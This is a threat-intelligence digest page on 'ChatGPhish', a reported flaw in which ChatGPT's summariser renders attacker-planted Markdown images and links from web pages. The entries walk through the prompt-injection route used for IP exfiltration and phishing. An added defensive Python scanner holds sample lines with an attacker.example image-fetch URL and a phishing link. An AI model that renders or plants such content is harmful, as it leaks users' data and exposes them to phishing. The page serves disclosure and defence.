ctipilot.ch

ChatGPhish

campaign · campaign:chatgphish-chatgpt-markdown-rendering-flaw-permiso-security

ChatGPhish — ChatGPT Markdown renderer trusts third-party image URLs

  • Coverage timeline: 2 appearances (first 2026-05-25 → last 2026-05-30)
  • Entries: 2 (2 distinct days)
  • Sources cited: 6 (6 hosts)
  • Sections touched: 2 (research, weekly-multi-day)
  • Co-occurring entities: 1 (see Related entities below)

Story timeline

  1. 2026-05-30 (research) ChatGPhish: Permiso Security documents ChatGPT Markdown renderer trusting third-party image URLs and links — used for IP exfiltration and phishing via legitimate chatgpt.com
  2. 2026-05-25 (weekly-multi-day) AI tooling as lure, attack surface and force-multiplier — the cross-day pattern no single daily framed whole

Where this entity is cited

  • weekly-multi-day: 1
  • research: 1

Source distribution

  • microsoft.com: 1 (17%)
  • permiso.io: 1 (17%)
  • pushsecurity.com: 1 (17%)
  • redcanary.com: 1 (17%)
  • sysdig.com: 1 (17%)
  • thehackernews.com: 1 (17%)

Related entities

Entries about ChatGPhish (2)

2026-05-30

ChatGPhish: Permiso Security documents ChatGPT Markdown renderer trusting third-party image URLs and links — used for IP exfiltration and phishing via legitimate chatgpt.com

notable research discovered 2026-05-30 05:00 UTC

Permiso Security's P0 Labs (researcher Andi Ahmeti) disclosed on 29 May 2026 that ChatGPT's web summarisation feature unconditionally trusts and renders Markdown image URLs and links extracted from third-party pages, executing them inside the trusted chatgpt.com UI (Permiso Security P0 Labs, 2026-05-29; The Hacker News, 2026-05-29).

An attacker embedding a small Markdown payload on any web page (GitHub README, SaaS dashboard, documentation portal) triggers the attack when a victim asks ChatGPT to summarise the page. The payload executes silently and can exfiltrate the victim's IP, User-Agent, and Referer via an attacker-hosted image fetch; render malicious links styled as ChatGPT output; inject fake security alerts; and serve QR codes from attacker-controlled S3 buckets that bypass desktop URL filters by moving the click action to mobile.

Permiso submitted the finding to OpenAI via Bugcrowd on 29 April; after a follow-up on 7 May, OpenAI marked it as not reproducible and then as not applicable, without resolution. No CVE has been assigned. Defenders using ChatGPT for document summarisation in enterprise workflows should restrict ChatGPT access to internal documentation portals and educate users that any AI-summarised third-party page can carry attacker instructions embedded in rendered output.

ai-abuse phishing info-disclosure global
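The entry above turns on Markdown image and link references in page text that point at hosts the organisation does not control. The following is an added example, not code from Permiso or from this site: it assumes a hypothetical pre-screening step that sees page text before it reaches a summariser, and the function names, allowlist and sample hosts are all constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Inline Markdown image ![alt](url) or link [text](url); an optional title is skipped.
MD_REF = re.compile(r'(?P<bang>!?)\[[^\]]*\]\(\s*<?(?P<url>[^)\s>]+)>?[^)]*\)')

# Constructed sample page text; every host is a placeholder, not an observed indicator.
SAMPLE = """# Project README
Build status: ![badge](https://img.example.org/ci.svg)
![](https://collector.attacker.example/p.png?id=1)
[Verify your account](//login.attacker.example/verify)
See the [install guide](docs/install.md).
"""
ALLOWED = {"example.org"}  # assumed allowlist of hosts the organisation trusts

def host_of(url):
    # Protocol-relative URLs (//host/path) still cause a remote fetch when rendered.
    if url.startswith("//"):
        url = "https:" + url
    return (urlsplit(url).hostname or "").lower()

def is_allowed(host, allowed):
    # Exact match or a subdomain of an allowlisted host.
    return any(host == a or host.endswith("." + a) for a in allowed)

def find_external_refs(text, allowed):
    """Return (kind, host, url) for each image/link pointing off the allowlist."""
    findings = []
    for m in MD_REF.finditer(text):
        host = host_of(m["url"])
        if host and not is_allowed(host, allowed):  # relative paths have no host
            findings.append(("image" if m["bang"] else "link", host, m["url"]))
    return findings

def neutralise(text, allowed):
    """Replace off-allowlist references with inert text so nothing is fetched or clickable."""
    def repl(m):
        host = host_of(m["url"])
        if not host or is_allowed(host, allowed):
            return m.group(0)
        return f"[{'image' if m['bang'] else 'link'} removed: {host}]"
    return MD_REF.sub(repl, text)

if __name__ == "__main__":
    for kind, host, url in find_external_refs(SAMPLE, ALLOWED):
        print(f"{kind:5} {host:30} {url}")
    print(neutralise(SAMPLE, ALLOWED))
```

The pattern covers inline references only; reference-style definitions and raw HTML `<img>` tags would need separate handling.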

2026-05-25

AI tooling as lure, attack surface and force-multiplier — the cross-day pattern no single daily framed whole

notable synthesis discovered 2026-05-25 05:00 UTC

Five separate daily items this week, each minor on its own, line up into the most important emerging pattern of the window: AI products are now simultaneously a lure brand, an attack surface, and an offensive force-multiplier.

As a lure: ACR Stealer was distributed through counterfeit Claude AI download pages promoted by malicious search ads (2026-05-26), and a cryptojacking campaign used AI-chatbot search-result poisoning to steer victims to GPU-utility lookalikes that dropped ScreenConnect and process-hollowed miners under a signed Microsoft binary (2026-05-28).

As an attack surface: LLMShare malvertising hid fake outage pages inside ChatGPT share links to serve infostealers (2026-05-30); ChatGPhish abused the ChatGPT Markdown renderer's trust of third-party image URLs and links for IP exfiltration and phishing from legitimate chatgpt.com (2026-05-30); and Red Canary detailed Entra Agent ID privilege escalation, injecting credentials into agent blueprints for tenant-wide lateral movement (2026-05-30).

As a force-multiplier: Sysdig TRT documented the first observed LLM-agent-driven post-exploitation, moving from a Marimo-notebook RCE (CVE-2026-39987) to internal-database exfiltration in four pivots in under an hour (2026-05-30).

The synthesis for a public-sector SOC: treat AI-brand download and search results as a live malvertising vector (block lookalike domains, prefer vendor-canonical download paths); scope DLP and egress controls to LLM rendering and share endpoints; and govern non-human agent identities (Entra Agent IDs, service-principal-equivalent AI agents) with the same conditional-access and credential-hygiene controls applied to service principals.

ai-abuse phishing infostealer identity cloud global